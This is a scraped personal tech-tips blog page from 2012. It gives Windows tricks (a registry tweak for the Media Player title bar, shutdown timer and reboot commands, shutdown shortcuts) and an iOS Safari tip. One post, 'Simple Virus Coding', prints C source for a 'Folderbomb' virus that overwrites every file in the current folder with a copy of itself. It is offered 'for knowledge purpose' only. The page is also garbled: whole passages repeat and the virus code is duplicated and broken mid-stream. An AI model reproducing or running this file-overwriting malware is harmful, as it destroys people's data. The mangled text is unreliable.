Change the title bar to read Windows Media Player provided by , so if I had entered text MAYANK , it would read: Windows Media Player provided by MAYANK.
[Start] [Run] [Regedit]
HKEY_CURRENT_USER>Software>Policies>Microsoft Create the Key [WindowsMediaPlayer] Create String value named [TitleBar]
Data Type: REG_SZ // Value Name: TitleBar
Double click TitleBar and Enter the text to be displayed in the title bar.
Exit Registry / Reboot
Wednesday, January 4, 2012
-:Countdown timer for shutdown computer:-
Many a times people like to sleep on music, but the problem is that the comp will continue running the whole night. Here is how you can create a countdown timer to shutdown your comp in your specified time.
Go to run in start menu and input this command
shutdown -s -t 3600
this will create a countdown timer which will go off in 3600 seconds (1 Hour). you can replace the 3600 to any time limit you want the comp to shutdown ,but remember the time should always be expressed in seconds i.e if u want the comp to shutdown in Half an hour you have to write 1800 and so on...
If you are as lazy as me and don't want to input the command each time, then create a batch file or shortcut
Batch:
open a notepad and type
shutdown -s -t 3600
now in the files menu select "save as" and save this file as Activate.bat
Just double clicking this file will activate your timer
Shortcut:
On the desktop right click and create a new shortcut. in the location type
shutdown -s -t 3600
Give it any name like "Activate timer"
Again, double clicking this newly created shortcut will do the same.
FORCING THE SHUTDOWN:
another operator that you can use with this command is -f . this will force a shutdown on system. suppose you want the comp to shutdown as quickly as possible you can give command
shutdown -s -f -t 00
here we have used a -f operator and the delay is set to 0 seconds.
(as we are talking about quick shutdown, u can use command
c:windowssystem32tsshutdn.exe 00 /POWERDOWN /DELAY:00 also)
STOPPING THE TIMER:
Any time when you want to stop the running timer use a -a operator(standing for abort)
the command is
shutdown -a
You can use it in any way u prefer, like direct input in run (or command prompt) , create a .bat file or create a shortcut on desktop
SOME OTHER OPTIONS:
shutdown -r (restarting)
shutdown -r -t 3600 (timer for restarting in 1 hour)
shutdown -r -f -t 00 (quick reboot)
Go to run in start menu and input this command
shutdown -s -t 3600
this will create a countdown timer which will go off in 3600 seconds (1 Hour). you can replace the 3600 to any time limit you want the comp to shutdown ,but remember the time should always be expressed in seconds i.e if u want the comp to shutdown in Half an hour you have to write 1800 and so on...
If you are as lazy as me and don't want to input the command each time, then create a batch file or shortcut
Batch:
open a notepad and type
shutdown -s -t 3600
now in the files menu select "save as" and save this file as Activate.bat
Just double clicking this file will activate your timer
Shortcut:
On the desktop right click and create a new shortcut. in the location type
shutdown -s -t 3600
Give it any name like "Activate timer"
Again, double clicking this newly created shortcut will do the same.
FORCING THE SHUTDOWN:
another operator that you can use with this command is -f . this will force a shutdown on system. suppose you want the comp to shutdown as quickly as possible you can give command
shutdown -s -f -t 00
here we have used a -f operator and the delay is set to 0 seconds.
(as we are talking about quick shutdown, u can use command
c:windowssystem32tsshutdn.exe 00 /POWERDOWN /DELAY:00 also)
STOPPING THE TIMER:
Any time when you want to stop the running timer use a -a operator(standing for abort)
the command is
shutdown -a
You can use it in any way u prefer, like direct input in run (or command prompt) , create a .bat file or create a shortcut on desktop
SOME OTHER OPTIONS:
shutdown -r (restarting)
shutdown -r -t 3600 (timer for restarting in 1 hour)
shutdown -r -f -t 00 (quick reboot)
-:One-click PC shut down:-
This is really very easy one but very effective one. Enjoy it!
First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.
But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:
shutdown -r -t 01 -c “Rebooting your PC”
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message “Rebooting your PC.” The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.
I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:
shutdown -s -t 03 -c “Bye Bye m8!”
shutdown -r -t 03 -c “I ll be back m8
!”
Switch
What it does
-s
Shuts down the PC.
-l
Logs off the current user.
-t nn
Indicates the duration of delay, in seconds, before performing the action.
-c “messagetext”
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-f
Forces any running applications to shut down.
-r
Reboots the PC.
First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.
But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:
shutdown -r -t 01 -c “Rebooting your PC”
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message “Rebooting your PC.” The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.
I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:
shutdown -s -t 03 -c “Bye Bye m8!”
shutdown -r -t 03 -c “I ll be back m8
Switch
What it does
-s
Shuts down the PC.
-l
Logs off the current user.
-t nn
Indicates the duration of delay, in seconds, before performing the action.
-c “messagetext”
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-f
Forces any running applications to shut down.
-r
Reboots the PC.
-:Simple Virus Coding (Only for knowledge purpose):-
Run this on your own responsibility
VIRUS CODE
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......*/
It will create Folder in a Folder in a Folder and so on ......*/
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
Monday, January 2, 2012
How to get black safari nav bars on iOS 5
Hi everyone today I'm going to show you how to get black navigation bars on your iOS 5 device without jailbreaking
Step #1. Go to settings
Step #2. Tap on safari settings
Step #3 enable private browsing
Thats it you should now have black navigation bars
About the Author
Latest tech news and how to's at http://www.techulo.com. Follow me at twitter at twitter.com/techulo
Step #1. Go to settings
Step #2. Tap on safari settings
Step #3 enable private browsing
Thats it you should now have black navigation bars
About the Author
Latest tech news and how to's at http://www.techulo.com. Follow me at twitter at twitter.com/techulo
Sunday, January 1, 2012
Subscribe to:
Posts (Atom)

